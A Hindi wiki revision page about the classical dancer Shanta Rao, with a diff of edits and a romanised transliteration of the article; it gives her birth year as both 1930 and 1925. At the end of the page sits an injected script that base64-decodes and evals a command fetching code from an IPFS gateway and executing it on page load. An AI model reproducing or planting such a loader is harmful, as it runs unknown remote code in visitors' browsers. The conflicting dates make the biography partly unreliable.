Difference between revisions of "शान्ता राव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''शान्ता राव''' (अंग्रेज़ी: ''Shanta Rao'', जन्म- 1930; मृत्यु- 28...' के साथ नया पृष्ठ बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
'''शान्ता राव''' ([[अंग्रेज़ी]]: ''Shanta Rao'', जन्म- [[1930]]; मृत्यु- [[28 दिसंबर]], [[2007]]) [[भारत]] की प्रसिद्ध शास्त्रीय नृत्यांगनाओं में से एक थीं। वह शास्त्रीय नृत्य की [[कथकली]], [[भरतनाट्यम]] और [[कुचिपुड़ी]] में निपुण थीं। वह [[पद्म श्री]] ([[1971]]), [[संगीत नाटक अकादमी पुरस्कार]] और शास्त्रीय नृत्य के लिए [[कालिदास सम्मान]] की प्राप्तकर्ता थीं।<br />
 
'''शान्ता राव''' ([[अंग्रेज़ी]]: ''Shanta Rao'', जन्म- [[1930]]; मृत्यु- [[28 दिसंबर]], [[2007]]) [[भारत]] की प्रसिद्ध शास्त्रीय नृत्यांगनाओं में से एक थीं। वह शास्त्रीय नृत्य की [[कथकली]], [[भरतनाट्यम]] और [[कुचिपुड़ी]] में निपुण थीं। वह [[पद्म श्री]] ([[1971]]), [[संगीत नाटक अकादमी पुरस्कार]] और शास्त्रीय नृत्य के लिए [[कालिदास सम्मान]] की प्राप्तकर्ता थीं।<br />
 
<br />
 
<br />
*शान्ता राव का जन्म सन 1925 में बम्बई (वर्तमान [[मुम्बई]], [[महाराष्ट्र]]) में हुआ था।
+
*शान्ता राव का जन्म सन् [[1925]] में बम्बई (वर्तमान [[मुम्बई]], [[महाराष्ट्र]]) में हुआ था।
*वह मुंबई और [[बैंगलोर]] में रहती थीं। वह मैंगलोर की रहने वाली थीं। 28 दिसंबर 2007 को मल्लेश्वरम, बैंगलोर में उनके घर पर उनका निधन हो गया
+
*वह मुंबई और [[बैंगलोर]] में रहती थीं। वह मैंगलोर की रहने वाली थीं। [[28 दिसंबर]] [[2007]] को मल्लेश्वरम, बैंगलोर में उनके घर पर उनका निधन हो गया
 
*उन्होंने मीनाक्षी सुंदरम पिल्लई से भरतनाट्यम की शिक्षा ली थी।
 
*उन्होंने मीनाक्षी सुंदरम पिल्लई से भरतनाट्यम की शिक्षा ली थी।
 
*सन [[1942]] में [[मद्रास]] की संगीत अकादमी में शान्ता राव ने भरतनाट्यम में अपनी शुरुआत की।
 
*सन [[1942]] में [[मद्रास]] की संगीत अकादमी में शान्ता राव ने भरतनाट्यम में अपनी शुरुआत की।
Line 12: Line 12:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{साँचा:शास्त्रीय गायक कलाकार}}{{कालिदास सम्मान}}{{संगीत नाटक अकादमी पुरस्कार}}{{पद्मश्री}}
+
{{शास्त्रीय गायक कलाकार}}{{संगीत नाटक अकादमी पुरस्कार}}{{पद्मश्री}}
 
[[Category:शास्त्रीय नर्तक]][[Category:जीवनी साहित्य]][[Category:पद्म श्री]][[Category:पद्म श्री (1971)]][[Category:कालिदास सम्मान]][[Category:संगीत नाटक अकादमी पुरस्कार]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:कला कोश]]
 
[[Category:शास्त्रीय नर्तक]][[Category:जीवनी साहित्य]][[Category:पद्म श्री]][[Category:पद्म श्री (1971)]][[Category:कालिदास सम्मान]][[Category:संगीत नाटक अकादमी पुरस्कार]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:कला कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 14:52, 30 January 2022

shanta rav (aangrezi: Shanta Rao, janm- 1930; mrityu- 28 disanbar, 2007) bharat ki prasiddh shastriy nrityaanganaoan mean se ek thian. vah shastriy nrity ki kathakali, bharatanatyam aur kuchipu di mean nipun thian. vah padm shri (1971), sangit natak akadami puraskar aur shastriy nrity ke lie kalidas samman ki praptakarta thian.

  • shanta rav ka janm sanh 1925 mean bambee (vartaman mumbee, maharashtr) mean hua tha.
  • vah muanbee aur baiangalor mean rahati thian. vah maiangalor ki rahane vali thian. 28 disanbar 2007 ko malleshvaram, baiangalor mean unake ghar par unaka nidhan ho gaya
  • unhoanne minakshi suandaram pillee se bharatanatyam ki shiksha li thi.
  • san 1942 mean madras ki sangit akadami mean shanta rav ne bharatanatyam mean apani shuruat ki.
  • unhoanne vempati chinna satyam ke tahat nrity roop kuchipu di ki khoj ki thi.
  • shanta rav ne veankatachalapati shastri se prerit aur prabhavit 'bhama natyam' ki rachana ki, jinhoanne unhean bhamasootram anushthanoan se parichit karaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>